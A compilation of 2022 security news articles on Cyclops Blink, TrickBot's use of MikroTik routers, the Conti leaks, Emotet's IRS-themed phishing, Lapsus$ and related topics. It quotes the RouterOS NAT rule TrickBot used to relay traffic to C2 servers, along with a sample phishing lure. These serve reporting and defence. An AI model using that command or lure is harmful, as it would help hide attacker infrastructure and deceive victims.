Cyclops Blink is a malware linked to the Russian-backed Sandworm hacking group that has historically targeted WatchGuard Firebox and other SOHO network devices.

The role of Cyclops Blink is to establish persistence for threat actors on the device, allowing them a point of remote access to compromised networks.

Because Cyclops Blink is modular, it can be easily updated to target new devices, constantly refreshing its scope and tapping into new pools of exploitable hardware.

Cyclops Blink now targets ASUS routers

In a coordinated disclosure, Trend Micro warned that the malware features a specialized module that targets several ASUS routers, allowing the malware to read the flash memory to gather information about critical files, executables, data, and libraries.

The malware then receives a command to nest in the flash memory and establish permanent persistence, as this storage space doesn't get wiped even by factory resets.

For more details on the ASUS module of Cyclops Blink, Trend Micro has published a technical writeup today explaining how it works.

At this point, the spread of Cyclops Blink appears indiscriminate and widespread, so it doesn't matter if you consider yourself a legitimate target or not.

As the malware is tied to the elite Sandworm hacking group (also tracked as Voodoo Bear, BlackEnergy, and TeleBots), we will likely see the threat actors targeting other router manufacturers in the future.

Sandworm has been linked to other well-known cyberattacks, including the BlackEnergy malware behind the Ukrainian blackouts of 2015 and 2016 [1, 2, 3] and the NotPetya ransomware, which led to billions worth of damage to companies worldwide starting in June 2017.

Vulnerable ASUS devices

In an advisory released today, ASUS warns that the following router models and firmware versions are vulnerable to Cyclops Blink attacks:

• GT-AC5300 firmware under 3.0.0.4.386.xxxx
• GT-AC2900 firmware under 3.0.0.4.386.xxxx
• RT-AC5300 firmware under 3.0.0.4.386.xxxx
• RT-AC88U firmware under 3.0.0.4.386.xxxx
• RT-AC3100 firmware under 3.0.0.4.386.xxxx
• RT-AC86U firmware under 3.0.0.4.386.xxxx
• RT-AC68U, AC68R, AC68W, AC68P firmware under 3.0.0.4.386.xxxx
• RT-AC66U_B1 firmware under 3.0.0.4.386.xxxx
• RT-AC3200 firmware under 3.0.0.4.386.xxxx
• RT-AC2900 firmware under 3.0.0.4.386.xxxx
• RT-AC1900P, RT-AC1900P firmware under 3.0.0.4.386.xxxx
• RT-AC87U (EOL)
• RT-AC66U (EOL)
• RT-AC56U (EOL)

At this time, ASUS has not released new firmware updates to protect against Cyclops Blink but have released the following mitigations that can be used to secure devices:

• Reset the device to factory default: Login into the web GUI, go to Administration → Restore/Save/Upload Setting, click the "Initialize all the setting and clear all the data log," and then click Restore button."
• Update to the latest available firmware.
• Ensure the default admin password has been changed to a more secure one.
• Disable Remote Management (disabled by default, can only be enabled via Advanced Settings).

If you are using any of the three models designated as EOL (end of life), note that these are no longer supported and thus won't receive a firmware security update. In this case, you are recommended to replace your device with a new one.

If you own WatchGuard network devices and are looking for that advisory instead, you can find the vendor's threat mitigation advice on this webpage.

ASUS warns of Cyclops Blink malware attacks targeting routers

TrickBot is a malware botnet distributed via phishing emails or dropped by other malware that has already infected a device. Once executed, TrickBot will connect to a remote command and control server to receive commands and download further payloads to run on the infected machine.

For years, TrickBot has used IoT devices, such as routers, to act as a proxy between an infected device and command and control servers (C2). These proxies are used to prevent researchers and law enforcement from finding and disrupting their command and control infrastructure.

In a new report by Microsoft, researchers explain how the TrickBot gang targeted vulnerable MikroTik routers using various methods to incorporate them as proxies for C2 communications.

Routing malicious traffic

The TrickBot operations utilized various methods when hacking into MikroTik routers, starting with using default credentials and then performing brute force attacks to guess the password.

If these initial methods did not provide access to the router, the threat actors would attempt to exploit CVE-2018-14847, a critical directory traversal vulnerability that allows unauthenticated, remote attackers to read arbitrary files. Using this vulnerability, the threat actors would steal the 'user.dat' file, which contains the user credentials for the router.

Once they gained access to the device, the threat actors used built-in '/ip', '/system', or '/tool' commands to create a network address translation (NAT) rule that rerouted traffic sent to port 449 on the router to port 80 on a remote command and control server.

/ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=[infected device] dst-address=[real C2 address]

Using this IP NAT rule, the C2 servers aren’t directly exposed to threat analysis but still allow communication for infected devices.

As Microsoft underlines, the actors appear to have an in-depth knowledge of the limited functions of the Linux-based OS in MikroTik devices, using custom SSH commands that would make little sense on other devices.

The MikroTik problem

An Eclypsium report highlighted last December that hundreds of thousands of MikroTik routers are still vulnerable to malware botnets, several years after the vendor cautioned about the existence of critical flaws.

Because these devices feature unusually powerful hardware, they are seen as high-value targets by malicious actors, especially those interested in resource-intensive operations such as DDoS attacks.

Although security upgrades have been available for years now, many remain vulnerable to botnet recruitment by exploiting unauthenticated, remote access, and code execution flaws.

The owners of MikroTik devices have been repeatedly urged to upgrade to RouterOS versions newer than 6.45.6 and avoid exposing the WinBox protocol.

"This analysis highlights the importance of keeping IoT devices secure in today’s ever evolving threat environment," Microsoft warns in their report.

Microsoft has now released a forensics tool named 'routeros-scanner' that network admins can use to scan MikroTik devices for signs that it was compromised by TrickBot.

This script will scan MikroTik devices for the following information:

• Get the version of the device and map it to CVEs
• Check for scheduled tasks
• Look for traffic redirection rules
• Look for DNS cache poisoning
• Look for default ports change
• Look for non-default users
• Look for suspicious files
• Look for proxy, socks, and FW rules

Additionally, Microsoft recommends performing the following steps on MikroTik devices to secure them further:

• Change the default password to a strong one
• Block port 8291 from external access
• Change SSH port to something other than the default (22)
• Make sure routers are up to date with the latest firmware and patches
• Use a secure virtual private network (VPN) service for remote access and restrict remote access to the router

TrickBot still alive?

In February 2022, the TrickBot operation was shut down, and developers are now working with the Conti ransomware gang to work on stealthier malware, such as the BazaarBackdoor and Anchor families.

As TrickBot has been disrupted in the past and later launched again, we may see threat actors reviving the operation in the future. Therefore, it is essential to make sure devices are properly secured so they cannot be abused in later campaigns or by other malware groups.

In the meantime, if you are using a MikroTik device, you are advised to use Microsoft's infection scanner as the malicious commands won't be reversed due to the shutdown and could be re-activated in the future.

Microsoft creates tool to scan MikroTik routers for TrickBot infections

The critical flaw, tracked as CVE-2022-0971, has been described as a use-after-free issue affecting the Blink Layout component. Sergei Glazunov of Google Project Zero has been credited for reporting the flaw.

Google doesn’t often assign a “critical severity” rating to Chrome vulnerabilities. In fact, over the past year, only four other Chrome updates fixed a critical issue. Two of the four critical vulnerabilities were discovered by Glazunov, who has also identified a high-severity bug that was patched this week.

The latest Chrome update includes 11 security fixes, including eight with a “high severity” rating. These flaws, which can typically allow a sandbox escape or remote code execution, are mostly use-after-free issues.

Google has paid out nearly $40,000 to the external researchers who reported the vulnerabilities patched with this Chrome update, but some rewards have yet to be determined.

The internet giant said recently that it paid out nearly $9 million in bug bounties last year, including roughly $3.1 million for Chrome vulnerabilities.

There has been a surge in Chrome vulnerabilities exploited in the wild, with 14 zero-days exploited in 2021, far more than any other popular web browser.

Google last week attempted to explain this trend, naming several factors that have apparently contributed.

The list includes more transparency regarding active exploitation, increased complexity of the browser, the need to chain multiple flaws for a useful exploit, and attackers increasingly targeting the browser itself following the death of Flash, their former favorite target.

source

While it is possible to check detected threats elsewhere, doing so requires quite a few clicks in the Windows Security app. The way results are displayed is also not ideal for getting a quick overview of recent threats.

WinDefLogView is a typical Nirsoft application. It is small in size and portable. Just download the archive from the Nirsoft website, extract it on the system, and run the executable file to launch the app. The program is compatible with Microsoft's Windows 10 and 11 operating systems only, but it may be run on older versions of Windows, e.g., Windows 7, to display information from remote systems running Windows 10 or 11.

The interface displays all detected threats in a table. Each line lists the filename, detection name, threat name, severity, category, action, origin, process name and more. A click on a column header sorts the listing accordingly, e.g., by date or severity.

The shortcut Ctrl-F or the selection of Edit > Find displays a search option to filter based in input; this is useful if lots of threats are displayed. The selection of File > Choose data source enables you to retrieve the data from remote computer systems or external folders.

The right-click menu displays several options. The most interesting opens the threat URL on Microsoft's website, which offers additional information on the detected threat.

WinDefLogView is a threat viewer, which means that it does not offer any options to react to the threats it displays. Some or all lines can be exported to the local system in several formats, including CSV, JSON and XML. Items can also be copied directly using CTRL-C. The copied items can then be pasted into spreadsheet applications such as Excel.

Description on Nirsoft's website:

WinDefLogView is a tool for Windows 10 and Windows 11 that reads the event log of Windows Defender (Microsoft-Windows-Windows Defender/Operational) and displays a log of threats detected by Windows Defender on your system. For every log line, the following information is displayed: Filename, Detect Time, Threat Name, Severity, Category, Detection User, Action, Origin, and more...

You can view the detected threats log on your local computer, on remote computers on your network, and on external disk plugged to your computer.

Closing Words

WinDefLogView is a useful application, as it provides a quick view of all detected Windows Defender threats. While it does not support threat actions, it may point users in the right direction immediately without having to use the cumbersome Windows Security application.

Now You: do you use Windows Defender?

Display all threats that Windows Defender detected with WinDefLogView

Conti’s implosion started with a single post on the group’s website, usually reserved for posting the names of its victims. Hours after Russian troops crossed Ukrainian borders on February 24, Conti offered its “full support” to the Russian government and threatened to hack critical infrastructure belonging to anyone who dared to launch cyberattacks against Russia.

But while many Conti members live in Russia, its scope is international. The war has divided the group; privately, some had railed against Putin’s invasion. And while Conti’s ringleaders scrambled to retract their statement, it was too late. The damage had been done. Especially because the dozens of people with access to Conti’s files and internal chat systems included a Ukrainian cybersecurity researcher who had infiltrated the group. They proceeded to rip Conti wide open.

On February 28, a newly created Twitter account called @ContiLeaks released more than 60,000 chat messages sent among members of the gang, its source code, and scores of internal Conti documents. The scope and scale of the leak is unprecedented; never before have the daily inner workings of a ransomware group been laid so bare. “Glory to Ukraine,” @ContiLeaks tweeted.

The leaked messages, reviewed in depth by WIRED, provide an unrivaled view into Conti’s operations and expose the ruthless nature of one of the world’s most successful ransomware gangs. Among their revelations are the group’s sophisticated businesslike hierarchy, its members’ personalities, how it dodges law enforcement, and details of its ransomware negotiations.

“We see the gang progressing. We see the gang living. We see the gang committing crimes and changing over the course of several years,” says Alex Holden, whose company Hold Security has tracked Conti members for most of the last decade. Holden, who was born in Ukraine but lives in America, says he knows the cybersecurity researcher who leaked the documents but says they are staying anonymous for safety reasons.

The Conti ransomware gang runs like any number of businesses around the world. It has multiple departments, from HR and administrators to coders and researchers. It has policies on how its hackers should process their code, and shares best practices to keep the group’s members hidden from law enforcement.

At the top of the business is Stern, who also goes by Demon and acts as the CEO—Conti members call Stern the “big boss.” All Conti members have pseudonymous usernames, which can change. Stern regularly chases people on their work and wants to account for their time. "Hello, how are you doing, write the results, successes or failures,” Stern wrote in one message sent to more than 50 Conti members in March 2021.

The Conti chat logs span two years, from the start of 2020 until February 27, 2022—the day before the messages leaked. In February WIRED reported on a small number of the messages, after they were provided by another source. The conversations are fragmented—think of taking your WhatsApp or Signal messages out of context—and were released in their original Russian form. WIRED reviewed a machine-translated version of the messages.

Some of the most revealing discussions take place between Stern and Mango, who acts as a general manager within Conti. Mango frequently launches into long monologues in private chats to Stern, either bemoaning team members or providing Stern with updates on the group’s projects. “They seem to be responsible for procuring different tools for different departments and making sure that the employees are being paid,” says Kimberly Goody, director of cybercrime analysis at security firm Mandiant.

The main Conti team consisted of 62 people, Mango told Stern in the middle of 2021. The exact number of Conti members fluctuates over time—at some points reaching around 100—as people join and leave the group. In one instance Stern says they are thinking of recruiting 100 more participants. “The group is so big that there are still middle managers,” group member Revers tells Meatball in June 2021.

Potential workers are funneled into Conti’s recruitment system from hacker forums and also legitimate job websites across the web. There’s even something of an onboarding process: When one new member joins the group they’re introduced to their team leader who will dish out their tasks. “I will hold a planning meeting in the evening and appoint you to the team,” Revers says in another message.

“What could be striking at first glance is the size, structure, and hierarchy of the organization,” says Soufiane Tahiri, a security researcher who has been reviewing the documents. “They operate pretty much like a software development company, and contrary to popular belief it seems that many coders have salaries and do not take part in the paid ransom.”

Rank-and-file programmers are paid around $1,500 to $2,000 per month for their work, but those negotiating ransom payments can take a cut of the profits. The group even claimed to have an unnamed journalist on its payroll in April 2021, who would get a 5 percent cut by helping put pressure on victims to pay up. “We have salaries on the 1st and 15th, usually 2 times a month,” Mango tells one member of the group. Sometimes Conti members ask for extra money due to family problems—one claims they need more because their mother suffered from a heart attack—or because they’re cash-strapped.

Money is a frequent subject of discussion within Conti—both a personal and group level. They debate the ransoms, often into millions of dollars, that they plan to charge businesses for providing them with decryption keys for their files. They discuss budgets available for buying equipment and the expenses of running physical offices and servers. “They also share a Google doc spreadsheet that contains a list of expenses,” Goody says of one instance.

But some Conti members display the bombast of cybercriminals caught driving luxury cars and storing piles of cash. Bio brags they have “80k” in their bank account and that they’ve “earned more this month with you than in 10 years.” They quickly backtrack, saying they probably exaggerated. On another occasion Skippy says they purchased a 27-inch iMac with their earnings—“wanted all my life.”

Skippy was also excited about taking a holiday from work. In November 2021 they said they planned to fly abroad in the new year but were warned by Mango they could be arrested. “It's up to you, of course, but I wouldn't fly abroad,” Mango said. Skippy replied asking if they are meant to “sit in Russia” for the rest of their life. Mango advised making sure their phone is “clean” and not taking their laptop. On other occasions, gang members ask their superiors if the holiday they requested has been approved and if they can finish early.

“We found through our logs that they have the full plethora of manuals of how they should maintain team spirit,” says Vitali Kremez, the CEO of security company AdvIntel. Kremez’s research is name-checked by Conti multiple times throughout the chats. “They are not just making money, they are thinking about people and how to be more successful in the environment they have created.”

Many of the conversations are dull, daily chatter as group members become acquainted and even friendly with each other. On New Years Eve 2021 some wished each other the best for 2022; members tell others they have caught Covid-19; they have issues with connectivity ("damn sorry my internet is dead"); and they bond with conversations about their partners or exes. The water cooler conversations are a stark contrast to Conti’s dark work.

Despite some camaraderie, staff turnover is high. Members appear to frequently leave, which necessitates constant recruitment. As WIRED previously reported, during 2020 the Conti members, as part of the wider Trickbot cybercrime gang, discussed opening six offices in St. Petersburg for new recruits. In July 2021, Mango messaged Stern and said they were interested in moving onto Moscow “time” and starting a new company. Echoing the rise in remote working over the last two years, Stern replied: "now it's better to manage the team from a laptop."

Most of the leaked Conti chat messages are DMs sent with Jabber, but the group coordinates attacks using Rocket.Chat, a slack-style platform that can be easily encrypted. Like Slack or Microsoft Teams, Rocket.Chat lists a group’s channels down a left-hand panel.

“There were channels created specifically for potential victims or infected victims,” says Émilio Gonzalez, a Canadian security researcher who studied the Conti files and re-created the group’s Rocket.Chat conversations. Companies are listed as “dead” or “done” in channel names. Each channel has two to four participants with different levels of seniority and responsibilities, Gonzalez says. “The conversation usually starts with credentials or access to a specific machine on the network of the victim.” The attacks then progress from there. A review of February 2022 RocketChat messages by The Intercept shows the group discussing drug use and child sexual abuse content in general channels, and making anti-Semitic comments about Ukrainian president Volodymyr Zelensky.

Beyond its chat messages, Conti uses common tools to organize. The team regularly references the Tor browser for getting online and GPG and ProtonMail for encrypted emails, uses Privnote for self-destructing messages, and shares files through file.io, qaz.im, and Firefox’s discontinued Send service. They also use databases, such as Crunchbase, to gather intelligence on the businesses they want to target.

Within Conti’s organizational structure is a team dedicated to open source intelligence that includes learning about potential threats. The group tried to purchase antivirus systems from security companies to test their malware against—creating fake companies to do so. They circulate YouTube videos about the latest security research, watch what researchers say about them, and share news articles about the group. (One Conti member sent Stern a Russian summary of WIRED’s February story about the Trickbot group the day after it was published).

As with any workplace, Conti members get frustrated with their colleagues. People don’t reply to messages, they vanish while working (“he went to get a haircut”), and they complain about long working hours. “For my part, I do not agree with the idea that I should be in touch 24 hours,” Driver complained in March 2021. Working all hours of the day “is a direct path to burnout,” they said.

The gang fines members who underperform or don’t show up for work, analysis of the chats by security firm CheckPoint shows. “I have 100 people here, half of them, even 10 percent, do not do what they need,” Stern said to Mango in the summer of 2021. “And they only ask for money, because they think that they are fucking useful.” At another point, Stern scolds one person: “everyone works except for you.”

The Conti member Dollar is a particular pain. On January 20, 2022, the handle Cyberganster launched into a tirade about Dollar to Mango. “Let's get the dollar out of the game,” Cyberganster writes. “He is a fucked up bastard.” It’s claimed that Dollar targeted hospitals with the group’s ransomware despite being told not to. Conti members say they have a rule of not attacking hospitals or medical centers, although a May 2021 attack against Ireland’s health service cost the organization $600 million to recover from. Six days after the complaint from Cybergangster, Mango confronts Dollar. “You really [are] more problems than good,” one message in a series of 11 says. Mango says “everyone constantly complains about you and gets angry” and accuses Dollar of spoiling the gang’s “reputation” by targeting hospitals.

Despite their everyday work life being exposed, the Conti group hasn’t gone away. But the messages include a trail of personal details, such as the handles they use online, Bitcoin addresses, and email addresses. “If this information is true, it definitely makes life easier for law enforcement,” says Tahiri. “By dismantling the group behind Trickbot/Conti we can be sure that the whole infrastructure will suffer.” It’s something the group’s members are well aware of: “We are already in the news,” read one of the last messages sent before the leak.

The Workaday Life of the World’s Most Dangerous Ransomware Gang

(May require free registration to view)

The case affects internet service resellers such as MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress.

The discovery comes from Wordfence, whose team first observed the malicious activity on March 11, 2022, with 298 websites infected by the backdoor within 24 hours, 281 of which were hosted on GoDaddy.

Old template spammer

The backdoor infecting all sites is a 2015 Google search SEO-poisoning tool implanted on the wp-config.php to fetch spam link templates from the C2 that are used to inject malicious pages into search results.

The campaign uses predominately pharmaceutical spam templates, served to visitors of the compromised websites instead of the actual content.

The goal of these templates is likely to entice the victims to make purchases of fake products, losing money and payment details to the threat actors.

Additionally, the actors can harm a website's reputation by altering its content and making the breach evident, but this doesn't seem to be the actors' aim at this time.

This type of attack is harder to detect and stop from the user's side due to this taking place on the server and not on the browser, and as such, local internet security tools won't detect anything suspicious.

Supply chain attack?

The intrusion vector hasn't been determined, so while this looks suspiciously close to a supply chain attack, it hasn't been confirmed.

Bleeping Computer has contacted GoDaddy to find out more about this possibility, but we have not heard back yet.

Notably, GoDaddy disclosed a data breach in November 2021 that affected 1.2 million customers and multiple Managed WordPress service resellers, including the six mentioned in the introduction.

That breach involved unauthorized access to the system that provisions the company's Managed WordPress sites. As such, it's not far-fetched to suggest that the two occurrences might be linked.

In any case, if your website is hosted on GoDaddy's Managed WordPress platform, make sure to scan your wp-config.php file to locate potential backdoor injections.

Wordfence also reminds admins that while removing the backdoor should be the first step, removing spam search engine results should also be a priority.

Hundreds of GoDaddy-hosted sites backdoored in a single day

Emotet is a malware infection distributed through phishing emails with attached Word or Excel documents containing malicious macros. Once these documents are opened, they will trick the user into enabling macros that will download the Emotet malware onto the computer.

Once Emotet is installed, the malware will steal victims' emails to use in future reply-chain attacks, send further spam emails, and ultimately install other malware that could lead to a Conti ransomware attack on the compromised network.

Emotet impersonates IRS.gov

In a new report by email security firm Cofense, researchers have spotted multiple phishing campaigns impersonating the Internet Revenue Service (IRS.gov) that use lures related to the 2022 U.S. tax season.

These emails pretend to be the IRS sending the recipient their 2021 Tax Return, W-9 forms, and other tax documents commonly required for the tax season.

Phishing email pretending to be from the IRS
Source: Cofense

While the email subjects and text of the IRS-themed emails vary, the general lure is that the IRS is contacting your business with either completed tax forms or ones you need to fill out and return to them.

An example of the text found in one of these emails is:

Attached please find your W-9 for [company_name] LLC. Password is 24509.

Please complete the attached, fillable form and return to me at your earliest. If you have ANY questions, please give me a shout!

Let me know if you would like a hard copy email as well.

According to Cofense's report published today, the phishing campaign is using numerous email subjects related to the U.S. tax season, including:

IRS Tax Forms W-9
Incorrect Form Selection
INCOME TAX RETURN 2021

Another Emotet 2022 tax season phishing email
Source: Cofense

Attached to the emails are zip files or HTML files that lead to zip files, which are password-protected to make it harder to detect by secure email gateways.

In tests conducted by BleepingComputer, these zip files fail to be parsed correctly by Windows' built-in archive extractor, potentially causing the campaign to have less impact.

However, third-party archive programs, like 7-Zip, have no problem extracting the files, as seen below.

Password-protected zip attachment
Source: BleepingComputer

Inside the zip files is a 'W-9 form.xslm' Excel file that, when opened, prompt the user to click on the "Enable Editing" and "Enable Content" button to view the document correctly.

Malicious Excel document
Source: BleepingComputer

Once a user clicks on these buttons, malicious macros will be executed that download and install the Emotet malware from hacked WordPress sites.

Once Emotet is installed, the malware will  download additional payloads, which have commonly been Cobalt Strike in recent campaigns.

However, the Emotet research group Cryptolaemus has also seen Emotet dropping the SystemBC remote access Trojan.

With Emotet now developed by the Conti Ransomware gang, all organizations, large and small, should be on the lookout for these phishing campaigns as they ultimately lead to ransomware attacks and data exfiltration.

As always, it is vital to remember that the IRS never sends unsolicited emails and corresponds only through the postal service. Therefore, if you receive an email claiming to be from the IRS, mark it as spam, and delete the email.

Emotet malware campaign impersonates the IRS for 2022 tax season

VT4Browsers submits certain file downloads automatically to the virus scanning service for checking. Users may then click on a link displayed by the extension to open the scan results on the VirusTotal website.

The extension submits downloads with the exception of document file types by default. Users of the extension may change the default behavior in the settings.

The settings are divided into a public part and a part that is reserved to users with an API key. The public part includes the following options:

• Scan downloads with VirusTotal-- this determines whether file downloads are submitted to the service.,
• Don't scan documents -- this determines whether document file types, e.g., pdf or docx, are submitted. These file types are not submitted by default.
• Show "Sent to VirusTotal" prompt when downloading files -- displays a prompt to the user to submit downloads on demand and not automatically.
• Pause downloads when sending to VirusTotal -- do not process downloads until files have been submitted to VirusTotal.
• Send anonymous passive DNS data to VirusTotal -- submits domain name to IP address mappings for DNS resolutions the browser performs to VirusTotal. Default set to on.

Users may want to disable the sending of anonymous passive DNS data and enable the "sent to VirusTotal" prompt to be in control of the sending. The extension does not reveal all document file types that it blocks from sending, and most users may want to be in control when it comes to the sending of files to the service.

The main change that the new VirusTotal browser extension introduces is support for the VT Augment widget. It allows users to link an API key in the extension to use advanced functionality.

The functionality consumes API lookups whenever it is used. It allows users to "highlight or enrich ioCs (hashes, domains, IPs, URLs) automatically.

The difference between highlighting and enrichment is the following:

The highlight feature identifies IoCs and adds a VirusTotal icon next to each IoC. When the icon is clicked an API call is performed to embed the IoC detection ratio and display the VT AUGMENT widget as a side panel. API quota is only consumed when you click on an IoC icon.

For each IoC identified in a site, the enrichment feature automatically queries the VT API and embeds the IoC’s security vendors detection ratio/score next to the IoC. Clicking on the VirusTotal icon or detection ratio next to each IoC will then display the VT AUGMENT widget as a side panel. This setting can generate API lookup spikes and is only recommended for premium API keys.

A support article on the VirusTotal website provides additional information on the new options.

VT4Browsers is available for Chrome and Firefox officially. Most Chromium-based browsers should install the extension without any issues. A quick test in Brave and Vivaldi was successful in that regard.

Now You: do you use Virustotal or other virus scanning services?

Virus scanning service VirusTotal releases VT4Browsers extension for Chrome and Firefox

Kaspersky is a Moscow-based cybersecurity and antivirus provider founded in 1997, that has a long history of success, but also controversy over the company's possible relationship with the Russian government.

Kaspersky's founder and CEO, Eugene Kaspersky, recently expressed a wish for "compromise" regarding Russia's invasion of Ukraine, which sparked outrage on Twitter, with many rejecting the firm's stance on the matter.

Kaspersky is also believed to offer its cybersecurity protection services to Russian state IT infrastructure, making it a concern that the company cannot stay completely neutral.

BSI warns against using Kaspersky

Today, the BSI is warning German companies to replace Kaspersky AV and any other products from the firm with alternative software from non-Russian vendors.

As the BSI statement explains, antivirus software typically has higher-level privileges on Windows systems, maintaining a permanent, encrypted, and non-verifiable connection to the vendor’s servers for constant virus definition updates.

Furthermore, as real-time protection from almost all antivirus vendors can upload suspicious files to remote servers for further analysis, there is concern that antivirus developers could use their software to exfiltrate sensitive files.

While Kaspersky is likely trustworthy and ethical, it still has to abide by Russian laws and regulations, including allowing state agents to access private firm databases.

BSI is taking this further by suggesting that Kaspersky could be forced into aiding the Russian intelligence forces in carrying out cyberattacks or conducting espionage.

"The actions of military and/or intelligence forces in Russia and the threats made by Russia against the EU , NATO and the Federal Republic of Germany in the course of the current military conflict are associated with a considerable risk of a successful IT attack. A Russian IT manufacturer can carry out offensive operations itself, be forced to attack target systems against its will, or be spied on without its knowledge as a victim of a cyber operation, or be misused as a tool for attacks against its own customers."

BSI

To avoid panic moves like switching off protection without activating a replacement security product, BSI advises all organizations to prepare accordingly by first performing a complete assessment.

Also, whenever a switch to alternative security products takes place, loss of comfort, functionality, and even safety is expected, so a remediation plan to address all that must be developed.

This warning has already led to German organizations, such as Germany's Eintracht sports club, to no longer use Kaspersky's services. 

However, Kaspersky believes that BSI's warning to remove Kaspersky products is a political decision rather than a technical assessment of their products.

A Kaspersky spokesperson shared the following statement with BleepingComputer regarding BSI's warnings, which we have shared in full below:

We believe this decision is not based on a technical assessment of Kaspersky products – that we continuously advocated for with the BSI and across Europe – but instead is being made on political grounds. We will continue to assure our partners and customers in the quality and integrity of our products, and we will be working with the BSI for clarification on its decision and for the means to address its and other regulators’ concerns.

At Kaspersky, we believe that transparency and the continued implementation of concrete measures to demonstrate our enduring commitment to integrity and trustworthiness to our customers is paramount. Kaspersky is a private global cybersecurity company and, as a private company, does not have any ties to the Russian or any other government.

We believe that peaceful dialogue is the only possible instrument for resolving conflicts. War isn’t good for anyone.

Our data processing infrastructure was relocated to Switzerland in 2018: since then, malicious and suspicious files voluntarily shared by users of Kaspersky products in Germany are processed in two data centers in Zurich that provide world-class facilities, in compliance with industry standards, to ensure the highest levels of security. Beyond our cyberthreat-related data processing facilities in Switzerland, statistics provided by users to Kaspersky can be processed on the Kaspersky Security Network’s services located in various countries around the world, including Canada and Germany. The security and integrity of our data services and engineering practices have been confirmed by independent third-party assessments: through the SOC 2 Audit conducted by a ‘Big Four’ auditor, and through the ISO 27001 certification and recent re-certification by TÜV Austria.

Kaspersky has set the industry benchmark for digital trust and transparency. Our customers can run a free technical and comprehensive review of our solutions, allowing them to:

• Review our secure software development documentation including threat analysis, secure review, and application security testing processes

• Review the source code of our leading solutions including Kaspersky Internet Security (KIS), our flagship consumer product; Kaspersky Endpoint Security (KES), our flagship enterprise product; and Kaspersky Security Center (KSC), a control console for our enterprise products

• Review all versions of our builds and AV-database updates, as well as the types of information which Kaspersky products send to our cloud-based Kaspersky Security Network (KSN)

• Rebuild the source code to make sure it corresponds to publicly available modules

• Review the results of an external audit of the company’s engineering practices conducted by one of the ‘Big Four’ accounting firms;

• Review the Software Bill of Materials (SBOM) for Kaspersky Internet Security (KIS), Kaspersky Endpoint Security (KES), and Kaspersky Security Center (KSC)

German government advises against using Kaspersky antivirus

What makes Lapsus$ noteworthy, too, is that the group isn't really a ransomware gang. Instead of exfiltrating data, encrypting target systems, and then threatening to leak the stolen information unless the victim pays up, Lapsus$ seems to exclusively focus on the data theft and extortion. The group gains access to victims through phishing attacks, then steals the most sensitive data it can find without deploying data-encrypting malware.

“It’s all been quite erratic and unusual,” says Brett Callow, a threat analyst at the antivirus company Emsisoft. “My sense is that they are a talented but inexperienced operation. Whether they will seek to expand and bring on affiliates or keep it small and lean remains to be seen.”

Lapsus$ emerged just a few months ago, at first focused almost exclusively on Portuguese-language targets. In December and January, the group hacked and attempted to extort Brazil’s health ministry, the Portuguese media giant Impresa, the South American telecoms Claro and Embratel, and Brazilian car rental company Localiza, among others. In some cases, Lapsus$ also mounted denial-of-service attacks against victims, making their sites and services unavailable for a period of time. 

Even in those early campaigns, Lapsus$ got creative; it set Localiza's website to redirect to an adult media site for a couple of hours until the company could revert it. 

As the attackers have ramped up and gained confidence, they've expanded their reach. In recent weeks, the group has hit Argentine ecommerce platforms MercadoLibre and MercadoPago, claims to have breached the British telecom Vodafone, and has begun leaking sensitive and valuable source code from Samsung and Nvidia. 

“Remember: The only goal is money, our reasons are not political,” Lapsus$ wrote in its Telegram channel in early December. And when the group announced its Nvidia breach on Telegram at the end of February, it added, “Please note: We are not state sponsored and we are not in politics AT ALL.”

Researchers say, though, that the truth about the gang's intentions are more murky. Unlike many of the most prolific ransomware groups, Lapsus$ seems to be more of a loose collective than a disciplined, corporatized operation. “At this point it's difficult to say with certainty what the group’s motivations are,” says Xue Yin Peh, a senior cyber-threat intelligence analyst at the security firm Digital Shadows. “There are no indications yet that the group uses ransomware to extort victims, so we can’t confirm that they’re financially motivated.”

Lapsus$ breached Nvidia in mid-February, stealing 1 terabyte of data, including a significant amount of sensitive information about the designs of Nvidia graphics cards, source code for an Nvidia AI rendering system called DLSS, and the usernames and passwords of more than 71,000 Nvidia employees. The group threatened to release more and more data if Nvidia didn't meet a series of unusual demands. At first the gang told the chipmaker to remove an anti-crypto-mining feature called Lite Hash Rate from its GPUs. Then Lapsus$ demanded that the company release certain drivers for its chips.

“The focus on cryptocurrency mining suggests that the group may ultimately be financially driven, however they are certainly taking a different approach than other groups in soliciting financial rewards,” Digital Shadows' Peh says.

In a tumultuous turn, Lapsus$ also accused Nvidia of “hacking back”—lashing out against the group in retaliation for the attacks. A source close to the Nvidia incident disputed the claims, though, telling WIRED that the company did not hack back or deploy malware against Lapsus$.

“It's difficult to say. The only source we've had for it is the ransomware group themselves,” says independent security researcher Bill Demirkapi of the claims. “The explanation they gave for how Nvidia hacked back does make sense, but I always take such statements with a grain of salt, because Lapsus$ has an incentive to make Nvidia look as bad as possible.”

Nvidia said in a statement that it learned about the breach on February 23 and quickly “further hardened our network, engaged cybersecurity incident response experts, and notified law enforcement.” The company acknowledged that the attackers stole employee authentication credentials and some proprietary data.

In a blithe, even rash move, Lapsus$ also included two sensitive Nvidia code-signing certificates in its leaks. Other attackers quickly abused them to make their malware look more authentic and trustworthy in certain scenarios. 

“This group operates on street cred and clout,” says Charles Carmakal, senior vice president and chief technical officer of the cybersecurity firm Mandiant. “They're bragging to their friends, and if they get money, they'll take it, but money doesn't seem to be the sole or even primary driver. So a victim company that wants to negotiate with them and may think about paying them likely won’t get the outcome they’re hoping for.”

That thirst for notoriety makes Lapsus$ particularly reckless and disruptive. While they don’t encrypt systems, Lapsus$ has deleted files and virtual machines, and generally caused “a whole lot of chaos,” as Carmakal puts it.

Just a few days after it began leaking Nvidia data, Lapsus$ also announced that it had stolen 190 gigabytes of data from Samsung, including boot-loader source code and algorithms for the Galaxy smartphone line's biometric authentication system. Samsung confirmed last week that it suffered a breach.

A few days later, Ubisoft joined the fray. “Last week, Ubisoft experienced a cyber security incident that caused temporary disruption to some of our games, systems, and services," the company wrote in a statement on Thursday. “As a precautionary measure we initiated a company-wide password reset … There is no evidence any player personal information was accessed or exposed as a by-product of this incident.”

Specific details about the group remain scarce for now. Researchers suspect that Lapsus$ is based in South America, potentially in Brazil, and say it may have a few members in Europe as well, perhaps in Portugal. Lapsus$ doesn't have a homepage on the dark web for posting samples of leaked data and negotiating with victims. Instead, in an unorthodox move for ransomware groups, the gang uses Telegram for most of its public-facing operations.

